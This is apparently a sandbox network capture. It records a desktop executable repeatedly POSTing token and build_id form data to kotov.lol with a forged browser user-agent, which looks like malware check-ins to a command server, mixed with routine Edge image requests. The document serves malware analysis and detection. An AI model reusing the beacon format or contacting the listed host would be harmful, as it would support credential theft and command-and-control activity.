2024-11-29 11:28:19 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49839	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:19 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:19 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IDBKFHJEBAAEBGDGDBFBCont
2024-11-29 11:28:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49841	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:19 UTC	506	OUT	GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:20 UTC	548	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Sat, 16 Nov 2024 01:10:29 GMT X-Source-Length: 822 X-Datacenter: northeu X-ActivityId: 5763b2c5-4e9a-486b-a0ff-57403523bc58 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 4096 Cache-Control: public, max-age=361049 Expires: Tue, 03 Dec 2024 15:45:49 GMT Date: Fri, 29 Nov 2024 11:28:20 GMT Connection: close
2024-11-29 11:28:20 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49840	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:20 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:20 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------DAEBKKKEHDHDGDGCFBKJCont
2024-11-29 11:28:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49844	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:21 UTC	506	OUT	GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:22 UTC	549	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 24 Nov 2024 14:36:49 GMT X-Datacenter: westus X-ActivityId: 42dc5545-2b92-4098-b302-828293611e02 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 17955 Content-Length: 8192 Cache-Control: public, max-age=400134 Expires: Wed, 04 Dec 2024 02:37:15 GMT Date: Fri, 29 Nov 2024 11:28:21 GMT Connection: close
2024-11-29 11:28:22 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49845	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:22 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:22 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AFCBFIJEHDHCBGDGDGCBCont
2024-11-29 11:28:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49846	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:23 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:23 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AFCBFIJEHDHCBGDGDGCBCont
2024-11-29 11:28:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49847	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:23 UTC	505	OUT	GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:23 UTC	548	IN	HTTP/1.1 200 OK Last-Modified: Wed, 20 Nov 2024 04:23:41 GMT Access-Control-Allow-Origin: * X-Datacenter: westus X-ActivityId: 09c9a816-65c3-4cec-9dc5-575462c725bf Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 62552 Content-Length: 8192 Cache-Control: public, max-age=406592 Expires: Wed, 04 Dec 2024 04:24:55 GMT Date: Fri, 29 Nov 2024 11:28:23 GMT Connection: close
2024-11-29 11:28:23 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	49849	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:25 UTC	505	OUT	GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:25 UTC	548	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Tue, 29 Oct 2024 19:03:22 GMT X-Source-Length: 95457 X-Datacenter: westus X-ActivityId: 155cd87c-435f-4d80-bfaf-3f0e9ec39163 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 8192 Cache-Control: public, max-age=114669 Expires: Sat, 30 Nov 2024 19:19:34 GMT Date: Fri, 29 Nov 2024 11:28:25 GMT Connection: close
2024-11-29 11:28:25 UTC	8192	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	49848	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:25 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:25 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AFHJJEHIEBKKFIDHDGHJCont
2024-11-29 11:28:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	49850	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:26 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:26 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IECBAFCAAKJDHJKFIEBGCont
2024-11-29 11:28:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	49851	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:26 UTC	506	OUT	GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:27 UTC	551	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Thu, 28 Nov 2024 18:37:26 GMT X-Datacenter: westus X-ActivityId: f428e15f-1251-4a9d-949d-9531d0d4f85d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t X-Source-Length: 1437868 Content-Length: 4096 Cache-Control: public, max-age=371322 Expires: Tue, 03 Dec 2024 18:37:09 GMT Date: Fri, 29 Nov 2024 11:28:27 GMT Connection: close
